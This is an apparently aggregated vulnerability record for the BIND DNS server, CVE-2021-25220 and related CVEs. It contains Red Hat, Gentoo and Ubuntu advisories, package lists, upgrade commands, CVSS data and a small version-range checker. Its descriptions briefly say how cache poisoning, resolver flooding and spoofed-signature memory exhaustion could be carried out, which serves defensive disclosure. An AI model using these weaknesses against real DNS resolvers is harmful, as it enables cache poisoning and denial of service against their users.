x86_64: bind-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: bind-debuginfo-9.11.4-26.P2.el7_9.13.ppc.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-devel-9.11.4-26.P2.el7_9.13.ppc.rpm bind-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.ppc.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.ppc.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.ppc.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-sdb-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.ppc64.rpm
ppc64le: bind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-sdb-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.ppc64le.rpm
s390x: bind-debuginfo-9.11.4-26.P2.el7_9.13.s390.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.s390x.rpm bind-devel-9.11.4-26.P2.el7_9.13.s390.rpm bind-devel-9.11.4-26.P2.el7_9.13.s390x.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.s390.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.s390x.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.s390.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.s390x.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.s390.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.s390x.rpm bind-sdb-9.11.4-26.P2.el7_9.13.s390x.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.s390x.rpm
x86_64: bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: bind-9.11.4-26.P2.el7_9.13.src.rpm
noarch: bind-license-9.11.4-26.P2.el7_9.13.noarch.rpm
x86_64: bind-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2021-25220
https://access.redhat.com/security/cve/CVE-2022-2795
https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBY9AIs9zjgjWX9erEAQiz9BAAiQvmAQ5DWdOQbHHizPAHBnKnBtNBfCT3
iaAzKQ0Yrpk26N9cdrvcBJwdrHpI28VJ3eemFUxQFseUqtAErsgfL4QqnjPjQgsp
U2qLPjqbzfOrbi1CuruMMIIbtxfwvsdic8OB9Zi7XzfZjWm2X4c6Ima+QXol6x9a
8J2qdzCqhoYUXJgdpVK9nAAGsPtidcnqLYYIcTclJArp6uRSlEEk7EbNJvs2SAbj
MUo5aq5BoVy2TkiMyqhT5voy6K8f4c7WbQYerNieps18541ZSr29fAzWBznr3Yns
gE10Aaoa8uCxlaexFR8EahPVYe6wJAm6R62LBabEWChbzW0oxr7X2DdzX9eiOwl0
wJT0n4GHoFsCGMa+v1yybkjHIUfiW25WC7bC4QDj4fjTpbicVlnttXhQJwCJK5bb
PC27GE6qi7EqwHYJa/jPenbIG38mXj/r2bwIr1qYQMLjQ8BQIneShky3ZWE4l/jd
zTMwGVal8ACBYdCALx/O9QNyzaO92xHLnKl3DIoqaQdjasIfGp/G6Xc1YggKyZAP
VVtXPiOIbReBVNWiBXMH1ZEQeNon4su0/MbMWrmJpwvEzYeXkuWO98LZ4dlLVuim
NG/dJ6RqzT6/aqRNVyOt5s4SLIQ5DrPXoPnZRUBsbpWhP6lxPhESKA0TUg5FYz33
eDGIrZR4jEY=
=azJw
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. 9) - aarch64, noarch, ppc64le, s390x, x86_64
- Description:
The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address. The dhcp packages provide a relay agent and ISC DHCP service required to enable and administer DHCP on a network. 8) - aarch64, ppc64le, s390x, x86_64
-
Gentoo Linux Security Advisory GLSA 202210-25
https://security.gentoo.org/
Severity: Low
Title: ISC BIND: Multiple Vulnerabilities
Date: October 31, 2022
Bugs: #820563, #835439, #872206
ID: 202210-25
Synopsis
Multiple vulnerabilities have been discovered in ISC BIND, the worst of which could result in denial of service.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-dns/bind < 9.16.33 >= 9.16.33
2 net-dns/bind-tools < 9.16.33 >= 9.16.33
Description
Multiple vulnerabilities have been discovered in ISC BIND. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All ISC BIND users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-dns/bind-9.16.33"
All ISC BIND-tools users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-dns/bind-tools-9.16.33"
References
[ 1 ] CVE-2021-25219 https://nvd.nist.gov/vuln/detail/CVE-2021-25219
[ 2 ] CVE-2021-25220 https://nvd.nist.gov/vuln/detail/CVE-2021-25220
[ 3 ] CVE-2022-0396 https://nvd.nist.gov/vuln/detail/CVE-2022-0396
[ 4 ] CVE-2022-2795 https://nvd.nist.gov/vuln/detail/CVE-2022-2795
[ 5 ] CVE-2022-2881 https://nvd.nist.gov/vuln/detail/CVE-2022-2881
[ 6 ] CVE-2022-2906 https://nvd.nist.gov/vuln/detail/CVE-2022-2906
[ 7 ] CVE-2022-3080 https://nvd.nist.gov/vuln/detail/CVE-2022-3080
[ 8 ] CVE-2022-38177 https://nvd.nist.gov/vuln/detail/CVE-2022-38177
[ 9 ] CVE-2022-38178 https://nvd.nist.gov/vuln/detail/CVE-2022-38178
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202210-25
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5

==========================================================================
Ubuntu Security Notice USN-5332-1
March 17, 2022
bind9 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.10
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in Bind.
Software Description:
- bind9: Internet Domain Name Server
Details:
Xiang Li, Baojun Liu, Chaoyi Lu, and Changgen Zou discovered that Bind incorrectly handled certain bogus NS records when using forwarders. A remote attacker could possibly use this issue to manipulate cache results. (CVE-2021-25220)
It was discovered that Bind incorrectly handled certain crafted TCP streams. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service. This issue only affected Ubuntu 21.10. (CVE-2022-0396)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 21.10:
  bind9 1:9.16.15-1ubuntu1.2

Ubuntu 20.04 LTS:
  bind9 1:9.16.1-0ubuntu2.10

Ubuntu 18.04 LTS:
  bind9 1:9.11.3+dfsg-1ubuntu1.17
In general, a standard system update will make all the necessary changes.
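The advisories above report the same vulnerable BIND version ranges as this record's affected-product data (9.11.0 up to but not including 9.11.37, 9.12.0 up to but not including 9.16.27, and 9.17.0 through 9.18.0). As a minimal illustrative sketch — not an official checker — those boundaries can be tested against an installed version string:

```python
# Sketch: check a BIND version string against the vulnerable ranges
# reported in this record for CVE-2021-25220. The boundaries below are
# taken from the record's affected-product entries; this ignores
# release suffixes such as "-S1" (Supported Preview Editions).

def parse(version: str) -> tuple:
    """Turn '9.16.27' into (9, 16, 27) for tuple-wise comparison."""
    return tuple(int(part) for part in version.split("."))

# Each entry is (inclusive lower bound, exclusive upper bound).
VULNERABLE_RANGES = [
    (parse("9.11.0"), parse("9.11.37")),  # 9.11.x: fixed in 9.11.37
    (parse("9.12.0"), parse("9.16.27")),  # 9.12-9.16: fixed in 9.16.27
    (parse("9.17.0"), parse("9.18.1")),   # 9.17.0 through 9.18.0 inclusive
]

def is_vulnerable(version: str) -> bool:
    v = parse(version)
    return any(lo <= v < hi for lo, hi in VULNERABLE_RANGES)

print(is_vulnerable("9.16.26"))  # True  (last affected 9.16.x)
print(is_vulnerable("9.16.27"))  # False (first fixed 9.16.x)
```

The version strings shipped by distributions (e.g. Ubuntu's `1:9.16.1-0ubuntu2.10`) carry epoch and packaging suffixes and include backported fixes, so for packaged builds the advisory's own fixed-package versions, not the upstream ranges, are authoritative.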
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "bind",
"scope": "gte",
"trust": 1.0,
"vendor": "isc",
"version": "9.11.0"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "bind",
"scope": "gte",
"trust": 1.0,
"vendor": "isc",
"version": "9.12.0"
},
{
"_id": null,
"model": "sinec ins",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0"
},
{
"_id": null,
"model": "bind",
"scope": "gte",
"trust": 1.0,
"vendor": "isc",
"version": "9.16.8"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "19.4"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "20.4"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "21.2"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "bind",
"scope": "gte",
"trust": 1.0,
"vendor": "isc",
"version": "9.17.0"
},
{
"_id": null,
"model": "junos",
"scope": "lt",
"trust": 1.0,
"vendor": "juniper",
"version": "19.3"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "22.1"
},
{
"_id": null,
"model": "bind",
"scope": "lte",
"trust": 1.0,
"vendor": "isc",
"version": "9.18.0"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "19.3"
},
{
"_id": null,
"model": "sinec ins",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "22.2"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "21.3"
},
{
"_id": null,
"model": "bind",
"scope": "lt",
"trust": 1.0,
"vendor": "isc",
"version": "9.11.37"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "20.3"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "20.2"
},
{
"_id": null,
"model": "bind",
"scope": "gte",
"trust": 1.0,
"vendor": "isc",
"version": "9.11.4"
},
{
"_id": null,
"model": "bind",
"scope": "lt",
"trust": 1.0,
"vendor": "isc",
"version": "9.16.27"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "21.4"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "36"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "21.1"
},
{
"_id": null,
"model": "fedora",
"scope": null,
"trust": 0.8,
"vendor": "fedora",
"version": null
},
{
"_id": null,
"model": "bind",
"scope": null,
"trust": 0.8,
"vendor": "isc",
"version": null
},
{
"_id": null,
"model": "esmpro/serveragent",
"scope": null,
"trust": 0.8,
"vendor": "NEC",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
},
{
"db": "NVD",
"id": "CVE-2021-25220"
}
]
},
"credits": {
"_id": null,
"data": "Siemens reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-1514"
}
],
"trust": 0.6
},
"cve": "CVE-2021-25220",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "CVE-2021-25220",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.3,
"id": "CVE-2021-25220",
"impactScore": 4.0,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "None",
"baseScore": 6.8,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2022-001797",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-25220",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-officer@isc.org",
"id": "CVE-2021-25220",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2021-25220",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202203-1514",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-25220",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-25220"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-1514"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
},
{
"db": "NVD",
"id": "CVE-2021-25220"
},
{
"db": "NVD",
"id": "CVE-2021-25220"
}
]
},
"description": {
"_id": null,
"data": "BIND 9.11.0 -\u003e 9.11.36 9.12.0 -\u003e 9.16.26 9.17.0 -\u003e 9.18.0 BIND Supported Preview Editions: 9.11.4-S1 -\u003e 9.11.36-S1 9.16.8-S1 -\u003e 9.16.26-S1 Versions of BIND 9 earlier than those shown - back to 9.1.0, including Supported Preview Editions - are also believed to be affected but have not been tested as they are EOL. The cache could become poisoned with incorrect records leading to queries being made to the wrong servers, which might also result in false information being returned to clients. Bogus NS records supplied by the forwarders may be cached and used by name if it needs to recurse for any reason. This issue causes it to obtain and pass on potentially incorrect answers. (CVE-2021-25220)\nBy flooding the target resolver with queries exploiting this flaw an attacker can significantly impair the resolver\u0027s performance, effectively denying legitimate clients access to the DNS resolution service. (CVE-2022-2795)\nBy spoofing the target resolver with responses that have a malformed ECDSA signature, an attacker can trigger a small memory leak. It is possible to gradually erode available memory to the point where named crashes for lack of resources. (CVE-2022-38177)\nBy spoofing the target resolver with responses that have a malformed EdDSA signature, an attacker can trigger a small memory leak. It is possible to gradually erode available memory to the point where named crashes for lack of resources. (CVE-2022-38178). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: bind security update\nAdvisory ID: RHSA-2023:0402-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:0402\nIssue date: 2023-01-24\nCVE Names: CVE-2021-25220 CVE-2022-2795\n====================================================================\n1. 
Summary:\n\nAn update for bind is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly. \n\nSecurity Fix(es):\n\n* bind: DNS forwarders - cache poisoning vulnerability (CVE-2021-25220)\n\n* bind: processing large delegations may severely degrade resolver\nperformance (CVE-2022-2795)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nAfter installing the update, the BIND daemon (named) will be restarted\nautomatically. \n\n5. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2064512 - CVE-2021-25220 bind: DNS forwarders - cache poisoning vulnerability\n2128584 - CVE-2022-2795 bind: processing large delegations may severely degrade resolver performance\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nbind-9.11.4-26.P2.el7_9.13.src.rpm\n\nnoarch:\nbind-license-9.11.4-26.P2.el7_9.13.noarch.rpm\n\nx86_64:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nbind-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 
7):\n\nSource:\nbind-9.11.4-26.P2.el7_9.13.src.rpm\n\nnoarch:\nbind-license-9.11.4-26.P2.el7_9.13.noarch.rpm\n\nx86_64:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nbind-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 
7):\n\nSource:\nbind-9.11.4-26.P2.el7_9.13.src.rpm\n\nnoarch:\nbind-license-9.11.4-26.P2.el7_9.13.noarch.rpm\n\nppc64:\nbind-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.ppc64.rpm\n\nppc64le:\nbind-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.ppc